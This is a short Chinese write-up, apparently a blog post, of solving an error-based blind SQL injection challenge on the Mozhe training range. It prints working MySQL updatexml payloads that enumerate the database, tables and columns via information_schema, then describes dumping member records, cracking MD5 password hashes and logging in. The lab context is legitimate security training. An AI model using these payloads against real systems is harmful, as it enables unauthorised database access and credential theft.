欢迎您访问 最编程 本站为您分享编程语言代码,编程技术文章!
您现在的位置是: 首页

报错盲注在墨者靶场的应用

最编程 2024-01-04 12:16:02
...

引入一下报错注入的知识点,参考【https://www.cnblogs.com/X-caiji/p/13186633.html

 

输入测试语句1' and 1=1--+,正常回显

 

1' and 1=2--+ 无任何报错信息,但是可以确定我们输入的内容确实是被执行了。

那么可以考虑是盲注

一般在实战过程中就需要考虑各种各样的情况了,靶场这块就直接告诉你是报错盲注了就直接用吧。

payload:

' and updatexml(1,concat(0x7e,(select database()),0x7e),1 )--+

 接下来就可以用那些语句替换了。

爆出表名:

payload:' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='stormgroup' limit 0,1),0x7e),1 )--+

 

爆出两个表

常规猜测有用的信息肯定是在member

接下来猜列

payload:' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='stormgroup' and table_name='member'limit 0,1),0x7e),1 )--+

 

 

 

一共爆出三列

接下来查数据:

 

名字只有一个数据

然后是密码

 

 

这一看就是MD5加密,找一个在线工具解密

 

 

查出来两个密码,尝试登录。

用第二个密码成功登录得到key